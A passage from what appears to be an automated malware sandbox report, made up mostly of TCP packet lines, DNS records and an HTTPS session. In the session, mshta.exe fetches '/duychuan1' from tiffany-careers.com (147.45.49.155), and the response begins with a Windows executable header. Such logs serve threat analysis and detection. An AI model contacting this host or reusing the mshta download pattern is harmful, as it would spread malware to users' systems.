                                                                                                                  Dec 23, 2024 07:08:23.283765078 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.283792019 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.283879042 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.283911943 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.285021067 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.289587975 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.289608002 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.289680004 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.289712906 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.289859056 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.295810938 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.295828104 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.295892954 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.295927048 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.295943975 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.296181917 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.301296949 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.301314116 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.301403046 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.301434040 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.301558971 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.451860905 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.451888084 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.452006102 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.452044010 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.453500986 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.457891941 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.457916975 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.458002090 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.458036900 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.459103107 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.463378906 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.463402987 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.463459015 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.463490009 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.463510990 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.463553905 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.469624043 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.469647884 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.469753027 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.469800949 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.470104933 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.475894928 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.475915909 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.475997925 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.476032972 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.476073980 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.476089001 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.481858015 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.481878996 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.481987953 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.482027054 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.485141039 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.487996101 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.488023043 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.488116026 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.488156080 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.489387989 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.493383884 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.493401051 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.493511915 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.493549109 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.495894909 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.644073963 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.644099951 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.644298077 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.644330978 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.647133112 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.650070906 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.650094986 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.650196075 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.650206089 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.650468111 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.655566931 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.655597925 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.655693054 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.655761957 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.659109116 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.661710978 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.661731958 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.661782026 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.661802053 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.661843061 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.663101912 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.667996883 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.668015957 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.668087959 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.668106079 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.668143034 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.671104908 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.673892975 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.673918009 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.673973083 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.673990011 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.674022913 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.675101042 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.680075884 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.680121899 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.680191994 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.680211067 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.680239916 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.683104038 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.686403990 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.686422110 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.686491013 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.686511040 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.687094927 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.835833073 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.835860014 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.836121082 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.836146116 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.838120937 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.841947079 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.841967106 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.842056036 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.842087984 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.845207930 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.848229885 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.848247051 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.848323107 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.848332882 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.849483013 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.853749990 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.853769064 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.853847027 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.853863955 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.857640982 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.859924078 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.859940052 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.860019922 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.860037088 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.860198975 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.865856886 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.865870953 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.865947962 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.865964890 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.866158962 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.872011900 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.872025967 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.872086048 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.872104883 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.872136116 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.872365952 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.878325939 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.878344059 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.878410101 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.878433943 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:23.878464937 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:23.878484011 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.027755022 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.027784109 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.027863026 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.027906895 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.027925014 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.027950048 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.034034967 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.034054995 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.034137011 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.034157991 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.034207106 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.040172100 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.040193081 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.040419102 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.040446997 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.040493965 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.046466112 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.046483040 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.046549082 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.046564102 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.046612978 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.052045107 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.052061081 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.052107096 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.052123070 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.052172899 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.052194118 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.057832003 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.057866096 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.057926893 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.057943106 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.058011055 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.064058065 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.064075947 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.064217091 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.064234018 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.064275980 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.070291996 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.070310116 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.070374012 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.070398092 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.070420980 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.070441008 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.220125914 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.220153093 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.220207930 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.220242023 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.220256090 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.220283031 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.226381063 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.226398945 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.226453066 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.226464987 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.226490021 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.226509094 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.232542038 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.232559919 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.232613087 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.232626915 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.232644081 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.232662916 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.238360882 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.238378048 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.238440037 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.238451004 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.238490105 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.239784956 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.239831924 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.239839077 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.239850044 CET44349725147.45.49.155192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:24.239873886 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.239903927 CET49725443192.168.2.8147.45.49.155
                                                                                                                  Dec 23, 2024 07:08:24.240417004 CET49725443192.168.2.8147.45.49.155

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 23, 2024 07:07:52.910346031 CET6279153192.168.2.81.1.1.1
                                                                                                                  Dec 23, 2024 07:07:53.184915066 CET53627911.1.1.1192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:18.154473066 CET6338653192.168.2.81.1.1.1
                                                                                                                  Dec 23, 2024 07:08:28.072923899 CET4929353192.168.2.81.1.1.1
                                                                                                                  Dec 23, 2024 07:08:28.290416956 CET53492931.1.1.1192.168.2.8
                                                                                                                  Dec 23, 2024 07:08:45.812508106 CET6483253192.168.2.81.1.1.1
                                                                                                                  Dec 23, 2024 07:08:46.042184114 CET53648321.1.1.1192.168.2.8

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Dec 23, 2024 07:07:52.910346031 CET192.168.2.81.1.1.10x9ca2Standard query (0)tiffany-careers.comA (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:08:18.154473066 CET192.168.2.81.1.1.10x7c60Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:08:28.072923899 CET192.168.2.81.1.1.10xaf4cStandard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:08:45.812508106 CET192.168.2.81.1.1.10xeee0Standard query (0)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Dec 23, 2024 07:07:53.184915066 CET1.1.1.1192.168.2.80x9ca2No error (0)tiffany-careers.com147.45.49.155A (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:08:03.009874105 CET1.1.1.1192.168.2.80xd665No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:08:03.009874105 CET1.1.1.1192.168.2.80xd665No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:08:03.009874105 CET1.1.1.1192.168.2.80xd665No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:08:03.009874105 CET1.1.1.1192.168.2.80xd665No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:08:03.009874105 CET1.1.1.1192.168.2.80xd665No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:08:18.291254997 CET1.1.1.1192.168.2.80x7c60No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:08:28.290416956 CET1.1.1.1192.168.2.80xaf4cName error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:08:46.042184114 CET1.1.1.1192.168.2.80xeee0Name error (3)nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigsnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:09:14.785614014 CET1.1.1.1192.168.2.80x44fcNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:09:14.785614014 CET1.1.1.1192.168.2.80x44fcNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:09:14.785614014 CET1.1.1.1192.168.2.80x44fcNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:09:14.785614014 CET1.1.1.1192.168.2.80x44fcNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:09:14.785614014 CET1.1.1.1192.168.2.80x44fcNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:09:49.081552982 CET1.1.1.1192.168.2.80xac49No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                  Dec 23, 2024 07:09:49.081552982 CET1.1.1.1192.168.2.80xac49No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • tiffany-careers.com

                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.849704147.45.49.1554434276C:\Windows\System32\mshta.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 06:07:54 UTC332OUTGET /duychuan1 HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Accept-Language: en-CH
                                                                                                                  UA-CPU: AMD64
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                  Host: tiffany-careers.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-12-23 06:07:55 UTC397INHTTP/1.1 200 OK
                                                                                                                  etag: "6ba97-67670d88-23c42;;;"
                                                                                                                  last-modified: Sat, 21 Dec 2024 18:48:40 GMT
                                                                                                                  content-length: 440983
                                                                                                                  accept-ranges: bytes
                                                                                                                  date: Mon, 23 Dec 2024 06:07:55 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                  connection: close
                                                                                                                  2024-12-23 06:07:55 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 1b 8a 28 f3 7a e4 7b f3 7a e4 7b f3 7a e4 7b e7 11 e7 7a f0 7a e4 7b e7 11 e0 7a e4 7a e4 7b e7 11 e1 7a f4 7a e4 7b e7 11 e5 7a ee 7a e4 7b f3 7a e5 7b da 7b e4 7b e7 11 ed 7a e0 7a e4 7b e7 11 1b 7b f2 7a e4 7b e7 11 e6 7a f2 7a e4 7b 52 69 63 68 f3 7a e4 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b4 fd 18 da 00 00 00
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(z{z{z{zz{zz{zz{zz{z{{{zz{{z{zz{Richz{PEL
